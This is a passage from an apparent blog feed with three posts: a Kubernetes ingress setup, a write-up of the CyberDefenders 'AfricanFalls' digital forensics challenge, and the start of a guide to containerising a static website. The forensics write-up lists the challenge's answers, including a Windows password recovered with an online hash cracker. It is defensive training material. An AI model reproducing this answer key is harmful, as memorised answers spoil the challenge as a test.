&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s-master$ kubectl describe ingress ingress-4n6nk8s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Name:             ingress-4n6nk8s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Labels:           &amp;lt;none&amp;gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Namespace:        default&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Address:          192.168.1.240&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Default backend:  default-http-backend:80 (&amp;lt;error: endpoints &lt;span class=&#34;string&#34;&gt;&amp;quot;default-http-backend&amp;quot;&lt;/span&gt; not found&amp;gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Rules:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Host         Path  Backends&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  ----         ----  --------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  justk8s.k8s&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;               /kitchen   kitchen-svc:80 (10.1.235.141:80)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;               /gym       gym-svc:80 (10.1.235.147:80)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Annotations:   nginx.ingress.kubernetes.io/rewrite-target: /&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Events:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Type    Reason  Age               From                      Message&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  ----    ------  ----              ----                      -------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  Normal  Sync    7s (x2 over 19s)  nginx-ingress-controller  Scheduled &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;sync&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;We see that the Default backend display  &lt;code&gt;(&amp;lt;error: endpoints &amp;quot;default-http-backend&amp;quot; not found&amp;gt;)&lt;/code&gt; .&lt;br&gt;
This error occur because we don’t specify a default backend (route) so when you enter  &lt;code&gt;http://justk8s.k8s/&lt;/code&gt;  we will find the nginx 404 not found page !&lt;/p&gt;
&lt;h1 id=&#34;check-the-deployments&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#check-the-deployments&#34;&gt;#&lt;/a&gt; Check the Deployments!&lt;/h1&gt;
&lt;p&gt;After Installing the LoadBalancer and Ingress Controller. Let’s try to access to our 2 apps. But before access to this apps let’s create an  &lt;code&gt;/etc/hosts&lt;/code&gt;  entry ( &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt;  for Windows):&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;/etc/hosts&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;192.168.1.240 justk8s.k8s &lt;span class=&#34;comment&#34;&gt;# The IP address of the Load Balancer of the Ingress Controller !&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now Let’s go to our browser! I add this entry in my master node! So I can access to these apps from my master node !:&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/p4sAzQX.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/tauie6V.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Bingo! Everything is Ok !&lt;/p&gt;
</content>
        <updated>2022-09-09T14:08:22.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/09/CyberDefenders/affrica-falls/</id>
        <title>CyberDefenders Writeup AfricanFalls</title>
        <link rel="alternate" href="http://example.com/2022/09/09/CyberDefenders/affrica-falls/"/>
        <content type="html">&lt;p&gt;This CTF challenge is from AfricaFalls Digital Forensics contest , We have disk image that have a lot of information like password, registries, browser history etc…&lt;br&gt;
We will investigate some useful informations! Be ready&lt;/p&gt;
&lt;h1 id=&#34;challenge-information&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#challenge-information&#34;&gt;#&lt;/a&gt; Challenge Information&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;John Doe was accused of doing illegal activities. A disk image of his laptop was taken. Your task is to analyze the image and understand what happened under the hood.&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjY=&#34; data-background-image=&#34;https://cyberdefenders.org/static/img/cyberdefenders-logo-white.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjY=&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CyberDefenders - Brave&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - DFIRScience&#34; style=&#34;--block-color:#fcc11c;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9ERklSU2NpZW5jZQ==&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/1517319188167204866/lgRHWtGk_400x400.jpg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9ERklSU2NpZW5jZQ==&#34;&gt;Author - DFIRScience&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;DFIRScience Twitter Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;h1 id=&#34;walkthrough&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#walkthrough&#34;&gt;#&lt;/a&gt; Walkthrough&lt;/h1&gt;
&lt;blockquote&gt;
&lt;p&gt;1- What is the MD5 hash value of the suspect disk?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Just inspec the  &lt;code&gt;ad1.txt&lt;/code&gt;  and you’ll find useful information about the disk image like the acquisition time and the checksum&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;12&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;13&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;14&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;15&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;16&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;17&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;18&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;19&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;20&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;21&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;built_in&#34;&gt;cat&lt;/span&gt; DiskDrigger.ad1.txt &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Created By AccessData® FTK® Imager 4.5.0.3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Case Information:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Acquired using: ADI4.5.0.3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;...&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;[Computed Hashes]&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; MD5 checksum:    9471e69c95d8909ae60ddff30d50ffa1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; SHA1 checksum:   167aa08db25dfeeb876b0176ddc329a3d9f2803a&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Image information:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Acquisition started:   Tue Jun 15 12:28:20 2021&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Acquisition finished:  Tue Jun 15 12:33:10 2021&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Segment list:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  D:\Users\Mawso3a\Desktop\DiskDrigger.ad1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Image Verification Results:&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Verification started:  Tue Jun 15 12:33:18 2021&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; Verification finished: Tue Jun 15 12:33:51 2021&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; MD5 checksum:    9471e69c95d8909ae60ddff30d50ffa1 : verified&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; SHA1 checksum:   167aa08db25dfeeb876b0176ddc329a3d9f2803a : verified&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer: 9471e69c95d8909ae60ddff30d50ffa1&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;2- What phrase did the suspect search for on 2021-04-29 18:17:38 UTC? (three words, two spaces in between)&lt;br&gt;
We found that the user used a chrome as his main browser! So we decide to get the database that contains the history of browsing. We can inspect it with DB Browser SQLite&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/YdY9w1L.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
After Opening the database you can search about the history and find the correct answer using the right timestamp&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/jL9EEDB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  password cracking lists&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;3- What is the IPv4 address of the FTP server the suspect connected to?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Wait man! FileZilla is installed in our system. I am sure that we will find the information in  &lt;code&gt;filezilla.xml&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/uOJpYIM.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  192.168.1.20&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;4- What date and time was a password list deleted in UTC? (YYYY-MM-DD HH:MM:SS UTC)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is EASY DUDE! just check the Recycle Bin ! You’ll find your target !&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/TuEyvM2.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  2021-04-29 18:22:17 UTC&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;5- How many times was Tor Browser ran on the suspect’s computer? (number only)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I guess this question is tricky! where is tor man !!! OK calm down you’ll find  &lt;code&gt;lnk&lt;/code&gt;  file about tor but i think it’s fake one ! Let’s try an LNK Parser. I’ll use  &lt;code&gt;ericzimmerman&lt;/code&gt;  tool !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/GelvVNQ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Wow firefox.exe in TOR LNK file! This is Joke&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  0&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;6- What is the suspect’s email address?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;OK backing again to the browser history to check if the user visit a mailing website !&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/BmHa8m2.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:   &lt;span class=&#34;exturl&#34; data-url=&#34;bWFpbHRvOmRyZWFtbWFrZXI4MkBwcm90b25tYWlsLmNvbQ==&#34;&gt;dreammaker82@protonmail.com&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;7- What is the FQDN did the suspect port scan?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;He asked about port scan?? mmm I guess nmap is here ! Nmap are you here ?&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/UMN9Zbr.png&#34; alt=&#34;&#34; title=&#34;NMAP: YES I AM HERE !&#34;&gt;&lt;/p&gt;
&lt;p&gt;Just i checked the PowerShell history. You’ll find it in  &lt;code&gt;AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/OwOcsXB.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  dfir.science&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;8- What country was picture “20210429_152043.jpg” allegedly taken in?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I tried to inspect the metadata of the image and i found GPS position information!&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;exiftool 20210429_152043.jpg&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;....&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;....&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;GPS Latitude                    : 16 deg 0&lt;span class=&#34;string&#34;&gt;&amp;#x27; 0.00&amp;quot; S&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;GPS Longitude                   : 23 deg 0&amp;#x27;&lt;/span&gt; 0.00&lt;span class=&#34;string&#34;&gt;&amp;quot; E&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;Focal Length                    : 3.7 mm&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;GPS Position                    : 16 deg 0&amp;#x27; 0.00&amp;quot;&lt;/span&gt; S, 23 deg 0&lt;span class=&#34;string&#34;&gt;&amp;#x27; 0.00&amp;quot; E&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;string&#34;&gt;Light Value                     : 13.7&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Ok let’s try to find the country using GPS Coordinates Finder&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/freR9Vd.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  Zambia&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;9- What is the parent folder name picture “20210429_151535.jpg” was in before the suspect copy it to “contact” folder on his desktop?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Shellbags explorer will solve our problem here! But wait man ! What are ShellBag artifacts?&lt;br&gt;
 &lt;code&gt;ShellBags&lt;/code&gt;  are a popular artifact in Windows forensics often used to identify the existence of directories on local, network, and removable storage devices. ShellBags are stored as a highly nested and hierarchal set of subkeys in the UsrClass&lt;br&gt;
This registyr hive will save us :  &lt;code&gt;[root]\Users\John Doe\AppData\Local\Microsoft\Windows\Usrclass.dat&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;ٍ&lt;img data-src=&#34;https://imgur.com/IAJ0GBZ.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:  Camera&lt;/p&gt;
&lt;/div&gt;
&lt;blockquote&gt;
&lt;p&gt;10- A Windows password hashes for an account are below. What is the user’s password?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Just try an online hash cracker&lt;/p&gt;
&lt;p&gt;ٍ&lt;img data-src=&#34;https://imgur.com/eQ1U5w7.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Answer:   AFR1CA!&lt;/p&gt;
&lt;/div&gt;
</content>
        <updated>2022-09-08T23:20:27.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/08/Kubernetes/private-docker-k8s/</id>
        <title>Dockerize a website &amp; Pull it privately in k8s</title>
        <link rel="alternate" href="http://example.com/2022/09/08/Kubernetes/private-docker-k8s/"/>
        <content type="html">&lt;p&gt;In this article you will learn how to containerize a static website using nginx. Then we will push a private docker image in dockerhub. Finally we will use this private image to be pulled in our Kubernetes cluster ! I will split this article to 2 small and easy steps, you can skip any one you want !&lt;/p&gt;
&lt;h1 id=&#34;containerize-a-static-website-and-push-it-on-dockerhub&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#containerize-a-static-website-and-push-it-on-dockerhub&#34;&gt;#&lt;/a&gt; Containerize a static website and push it on dockerhub&lt;/h1&gt;
&lt;p&gt;In this Section we will choose a template from random websites that provides free css templates, then we will dockerize it !&lt;/p&gt;
&lt;h2 id=&#34;dockerize-the-website&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#dockerize-the-website&#34;&gt;#&lt;/a&gt; Dockerize the website&lt;/h2&gt;
&lt;p&gt;I’ll choose this template from this &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cuZnJlZS1jc3MuY29tL2ZyZWUtY3NzLXRlbXBsYXRlcy9wYWdlMjgyL3JveWFsLWNhcnM=&#34;&gt;link&lt;/span&gt;&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/ngHGyw0.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Download it and let’s create our Dockerfile !&lt;br&gt;
We will use the  &lt;code&gt;nginx:alpine&lt;/code&gt;  image and copy all the assets of the website to the  &lt;code&gt;/usr/share/nginx/html&lt;/code&gt;  to be hosted by the nginx webserver.&lt;/p&gt;
&lt;figure class=&#34;highlight dockerfile&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;FROM&lt;/span&gt; nginx:alpine&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;WORKDIR&lt;/span&gt;&lt;span class=&#34;language-bash&#34;&gt; /usr/share/nginx/html&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;RUN&lt;/span&gt;&lt;span class=&#34;language-bash&#34;&gt; &lt;span class=&#34;built_in&#34;&gt;rm&lt;/span&gt; -rf ./*&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;COPY&lt;/span&gt;&lt;span class=&#34;language-bash&#34;&gt; ./ ./&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;RUN&lt;/span&gt;&lt;span class=&#34;language-bash&#34;&gt; &lt;span class=&#34;built_in&#34;&gt;chmod&lt;/span&gt; +r -R . &lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;ENTRYPOINT&lt;/span&gt;&lt;span class=&#34;language-bash&#34;&gt; [&lt;span class=&#34;string&#34;&gt;&amp;quot;nginx&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;-g&amp;quot;&lt;/span&gt;,&lt;span class=&#34;string&#34;&gt;&amp;quot;daemon off;&amp;quot;&lt;/span&gt;]&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now it’s time to build the container image&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf@4n6nk8s:~$ sudo docker build . -t &amp;lt;user_name&amp;gt;/cars-app&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Sending build context to Docker daemon  2.454MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Step 1/5 : FROM nginx:alpine&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;alpine: Pulling from library/nginx&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;213ec9aee27d: Downloading [===================================&amp;gt;               ]  2.018MB/2.806MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2546ae67167b: Downloading [=========&amp;gt;                                         ]  1.461MB/7.403MB&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;23b845224e13: Download complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9bd5732789a3: Download complete&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;328309e59ded: Waiting&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;b231d02e5150: Waiting&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Now let’s create a container to test it before make push it!&lt;/p&gt;
